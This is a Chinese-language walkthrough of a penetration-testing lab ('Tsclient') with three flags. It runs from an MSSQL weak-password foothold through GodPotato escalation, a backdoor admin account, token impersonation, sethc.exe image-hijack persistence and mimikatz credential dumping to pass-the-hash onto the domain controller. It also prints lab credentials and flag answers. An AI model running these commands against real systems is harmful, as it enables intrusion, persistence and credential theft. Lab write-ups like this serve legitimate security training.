靶标介绍

Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。

MSSQL RCE

[+] mssql:39.98.127.181:1433:sa 1qaz!QAZ

fscan 扫出mssql弱口令1qaz!QAZ,连接看看
image
可以xpcmdshell执行命令
image

whoami /priv

特权信息
----------------------

特权名                        描述                 状态  
============================= ==================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌   已禁用
SeIncreaseQuotaPrivilege      为进程调整内存配额   已禁用
SeChangeNotifyPrivilege       绕过遍历检查         已启用
SeImpersonatePrivilege        身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege       创建全局对象         已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集       已禁用

经典的SeImpersonatePrivilege,直接上土豆GodPotato-NET4.exe
image
建个后门用户先然后rdp

C:/Users/MSSQLSERVER/Desktop/GodPotato-NET4.exe  -cmd "net user tao0845 123456qwe. /add"
C:/Users/MSSQLSERVER/Desktop/GodPotato-NET4.exe  -cmd "net localgroup administrators tao0845 /add"

image

 _________  ________  ________  ___       ___  _______   ________   _________   
|\___   ___\\   ____\|\   ____\|\  \     |\  \|\  ___ \ |\   ___  \|\___   ___\ 
\|___ \  \_\ \  \___|\ \  \___|\ \  \    \ \  \ \   __/|\ \  \\ \  \|___ \  \_| 
     \ \  \ \ \_____  \ \  \    \ \  \    \ \  \ \  \_|/_\ \  \\ \  \   \ \  \  
      \ \  \ \|____|\  \ \  \____\ \  \____\ \  \ \  \_|\ \ \  \\ \  \   \ \  \ 
       \ \__\  ____\_\  \ \_______\ \_______\ \__\ \_______\ \__\\ \__\   \ \__\
        \|__| |\_________\|_______|\|_______|\|__|\|_______|\|__| \|__|    \|__|
              \|_________|                                                      


Getting flag01 is easy, right?

flag01: flag{94cd1091-742b-401c-b5b7-a7d631fc5f0e}


Maybe you should focus on user sessions...

提示这个机器可能有其他用户session,还有提示镜像劫持

镜像劫持

先查

reg query 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

注册表没查到,查询在线用户

C:\Users\tao0845\Desktop>quser
 用户名                会话名             ID  状态    空闲时间   登录时间
 john                  rdp-tcp#0           2  运行中         25  2025/2/14 18:40
>tao0845               rdp-tcp#2           3  运行中          .  2025/2/14 18:52

john在线

C:\Users\tao0845\Desktop>netstat -an | find "3389"
TCP    172.22.8.18:3389       172.22.8.31:49721      ESTABLISHED

查看端口情况可以知道是从内网连进来的,扫下内网先

172.22.8.15 DC XIAORANG\DC01
172.22.8.18 MSSQL
172.22.8.31 WIN19-CLIENT
172.22.8.46 WIN2016.xiaorang.lab

使用SharpToken模拟用户,用.NET 4.8编译一个放上去

c:\Users\tao0845\Desktop>SharpToken.exe execute "WIN-WEB\John" cmd true
[*] process start with pid 7220
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。

c:\Users\tao0845\Desktop>whoami
whoami
win-web\john

成功拿到john的shell,共享目录存在敏感文件

c:\Users\tao0845\Desktop>net use
net use
会记录新的网络连接。


状态       本地        远程                      网络

-------------------------------------------------------------------------------
                       \\TSCLIENT\C              Microsoft Terminal Services
命令成功完成。


c:\Users\tao0845\Desktop>dir \\TSCLIENT\C
dir \\TSCLIENT\C

 驱动器 \\TSCLIENT\C 中的卷没有标签。
 卷的序列号是 C2C5-9D0C

 \\TSCLIENT\C 的目录

2022/07/12  10:34                71 credential.txt
2022/05/12  17:04    <DIR>          PerfLogs
2022/07/11  12:53    <DIR>          Program Files
2022/05/18  11:30    <DIR>          Program Files (x86)
2022/07/11  12:47    <DIR>          Users
2022/07/11  12:45    <DIR>          Windows
               1 个文件             71 字节
               5 个目录 30,053,588,992 可用字节

c:\Users\tao0845\Desktop>
c:\Users\tao0845\Desktop>type \\TSCLIENT\C\credential.txt
type \\TSCLIENT\C\credential.txt
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

拿到一组凭据xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#还提示了镜像劫持
先尝试登陆下先

root@kali2 [~] ➜  proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
SMB         172.22.8.46     445    WIN2016          [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED 

显示密码过期 可以rdesktop登录修改密码也可以smbpasswd.py修改

root@kali2 [~] ➜  proxychains4 -q smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass '123456qwe.'

image
修改密码后成功登录,然后镜像劫持shift后门

PS C:\Users\Aldrich> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"
操作成功完成。

image
成功拿到管理员权限,先加个管理员用户方便权限维持
管理员目录拿到flag2

   . .    .       . .       . .       .      .       . .       . .       . .    .    
.+'|=|`+.=|`+. .+'|=|`+. .+'|=|`+. .+'|      |`+. .+'|=|`+. .+'|=|`+. .+'|=|`+.=|`+. 
|.+' |  | `+.| |  | `+.| |  | `+.| |  |      |  | |  | `+.| |  | `+ | |.+' |  | `+.| 
     |  |      |  | .    |  |      |  |      |  | |  |=|`.  |  |  | |      |  |      
     |  |      `+.|=|`+. |  |      |  |      |  | |  | `.|  |  |  | |      |  |      
     |  |      .    |  | |  |    . |  |    . |  | |  |    . |  |  | |      |  |      
     |  |      |`+. |  | |  | .+'| |  | .+'| |  | |  | .+'| |  |  | |      |  |      
     |.+'      `+.|=|.+' `+.|=|.+' `+.|=|.+' |.+' `+.|=|.+' `+.|  |.|      |.+'      




flag02: flag{7ccff685-9d4c-4f5b-83cd-a83b00c57dbd}

PTH

mimikatz收集域内信息

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
msv :	
 [00000003] Primary
 * Username : WIN2016$
 * Domain   : XIAORANG
 * NTLM     : 617e3e780f46f6a6a5ae021bf62d3b10
 * SHA1     : 2046eee39c1d66e38146de0f100154f751eeca6c

抓到了WIN2016$用户哈希,而它正好是域管理员组的,直接pth就行

root@kali2 [~] ➜  proxychains4 -q psexec.py -hashes :617e3e780f46f6a6a5ae021bf62d3b10 'WIN2016$'@172.22.8.15 -codec gbk

c:\Users\Administrator\flag> type flag03.txt
 _________               __    _                  _    
|  _   _  |             [  |  (_)                / |_  
|_/ | | \_|.--.   .---.  | |  __  .---.  _ .--. `| |-' 
    | |   ( (`\] / /'`\] | | [  |/ /__\\[ `.-. | | |   
   _| |_   `'.'. | \__.  | |  | || \__., | | | | | |,  
  |_____| [\__) )'.___.'[___][___]'.__.'[___||__]\__/  


Congratulations! ! !

flag03: flag{1e6b54f6-0cfc-4401-a592-32070f6a70f5}

nm输入flag的时候点到重置靶机了,西巴罗马。